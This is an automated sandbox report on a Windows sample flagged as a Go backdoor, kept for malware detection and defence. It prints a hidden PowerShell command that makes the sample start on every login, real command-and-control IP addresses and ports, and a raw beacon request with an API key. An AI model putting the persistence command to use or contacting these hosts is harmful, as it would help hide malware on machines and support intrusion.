Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lDO4WBEQyL.exe

Overview

General Information

Sample name:lDO4WBEQyL.exe
renamed because original name is a hash value
Original sample name:43142552e4812e3337226ca1664ed728.exe
Analysis ID:1583035
MD5:43142552e4812e3337226ca1664ed728
SHA1:8c1806c454beb91cc24fec69ca8e26c560790d6e
SHA256:d08de75b76be3596cbcb6fa6f0c39bd41cd876d29cec1108990856989d6ed0f9
Tags:exeuser-abuse_ch
Infos:

Detection

GO Backdoor
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
AI detected suspicious sample
Found Tor onion address
Machine Learning detection for sample
Suspicious powershell command line found
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • lDO4WBEQyL.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\lDO4WBEQyL.exe" MD5: 43142552E4812E3337226CA1664ED728)
    • powershell.exe (PID: 7940 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • lDO4WBEQyL.exe (PID: 8188 cmdline: "C:\Users\user\Desktop\lDO4WBEQyL.exe" MD5: 43142552E4812E3337226CA1664ED728)
    • powershell.exe (PID: 5232 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • lDO4WBEQyL.exe (PID: 2920 cmdline: "C:\Users\user\Desktop\lDO4WBEQyL.exe" MD5: 43142552E4812E3337226CA1664ED728)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: lDO4WBEQyL.exe PID: 7328JoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security

    Sigma Signatures

    Sigma detected: CurrentVersion Autorun Keys Modification
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Desktop\lDO4WBEQyL.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7940, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\App
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }", CommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lDO4WBEQyL.exe", ParentImage: C:\Users\user\Desktop\lDO4WBEQyL.exe, ParentProcessId: 7328, ParentProcessName: lDO4WBEQyL.exe, ProcessCommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\lDO4WBEQyL.exe\" }", ProcessId: 7940, ProcessName: powershell.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-01T17:02:44.876620+010028555361A Network Trojan was detected192.168.2.559227185.157.213.25322132TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-01T17:03:14.288230+010028555371A Network Trojan was detected192.168.2.559227185.157.213.25322132TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-01T17:03:14.460470+010028555381A Network Trojan was detected185.157.213.25322132192.168.2.559227TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-01T17:02:44.862102+010028555391A Network Trojan was detected185.157.213.25322132192.168.2.559227TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: lDO4WBEQyL.exeAvira: detected
    Multi AV Scanner detection for submitted file
    Source: lDO4WBEQyL.exeVirustotal: Detection: 23%Perma Link
    Source: lDO4WBEQyL.exeReversingLabs: Detection: 36%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for sample
    Source: lDO4WBEQyL.exeJoe Sandbox ML: detected
    Source: lDO4WBEQyL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: lDO4WBEQyL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Admin\Workspace\1803121139\Project\Release\Project.pdb source: lDO4WBEQyL.exe

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 185.157.213.253:22132 -> 192.168.2.5:59227
    Source: Network trafficSuricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.5:59227 -> 185.157.213.253:22132
    Source: Network trafficSuricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.5:59227 -> 185.157.213.253:22132
    Source: Network trafficSuricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 185.157.213.253:22132 -> 192.168.2.5:59227
    Found Tor onion address
    Source: lDO4WBEQyL.exe, 00000000.00000002.3892279336.0000000000FFA000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
    Source: lDO4WBEQyL.exe, 00000000.00000002.3895681931.00000000026C0000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
    Source: lDO4WBEQyL.exe, 00000006.00000002.3891955963.0000000000FFA000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
    Source: lDO4WBEQyL.exe, 00000006.00000002.3895399995.0000000002B10000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
    Source: global trafficTCP traffic: 192.168.2.5:59227 -> 185.157.213.253:22132
    Source: global trafficTCP traffic: 192.168.2.5:59036 -> 162.159.36.2:53
    Source: Joe Sandbox ViewIP Address: 46.8.232.106 46.8.232.106
    Source: Joe Sandbox ViewASN Name: TVHORADADAES TVHORADADAES
    Source: unknownDNS traffic detected: query: 198.187.3.20.in-addr.arpa replaycode: Name error (3)
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.213.253
    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.213.253
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.213.253
    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.213.253
    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.213.253
    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.213.253
    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.213.253
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.213.253
    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.213.253
    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.213.253
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.213.253
    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.213.253
    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.213.253
    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.213.253
    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.213.253
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.213.253
    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.213.253
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
    Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 46.8.232.106User-Agent: Go-http-client/1.1Content-Length: 178X-Api-Key: z9AJoadUAccept-Encoding: gzipData Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 34 05 0d 16 07 23 11 16 02 2f 30 08 0e 22 29 2a 0a 0a 01 10 06 14 54 58 09 54 36 00 07 38 56 52 0b 59 50 24 0e 04 20 1c 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2c 2f 01 09 1b 3e 07 2d 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 0a 1f 16 5e 26 07 23 25 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 26 36 39 41 2d 5e 3a 54 29 04 09 44 45 45 0e 0b 5b 44 53 45 57 5c 5f 52 5b 52 56 5d 0b 52 51 56 51 0a 5d 55 5a 50 51 5d 58 05 08 56 55 59 5a 03 0d 50 51 57 4c 1b Data Ascii: M*L\K4#/0")*TXT68VRYP$ DEE2MTD,/>-ACL>K]A^&#%DEE1AULV&69A-^:T)DEE[DSEW\_R[RV]RQVQ]UZPQ]XVUYZPQWL
    Source: lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://147.45.196.157
    Source: lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://147.45.196.157185.157.213.253;22132;hdPotrYMtNLspDL2:4JI/ggA/xcm4fqR6ijq.9ju8LHC.jmQ2AXr36Hj2
    Source: lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC40000.00000004.00001000.00020000.00000000.sdmp, lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://147.45.196.157http://46.8.232.106
    Source: lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://38.180.205.164
    Source: lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106
    Source: lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61
    Source: lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.9
    Source: lDO4WBEQyL.exe, 00000000.00000002.3899913494.000000000DC06000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91
    Source: powershell.exe, 00000008.00000002.3891780842.0000000002AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microL
    Source: powershell.exe, 00000004.00000002.2945903417.0000000005A32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3899974175.00000000059C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000008.00000002.3893167157.0000000004AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000004.00000002.2943211667.00000000049D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3893167157.0000000004961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000008.00000002.3893167157.0000000004AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000004.00000002.2943211667.00000000049D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3893167157.0000000004961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
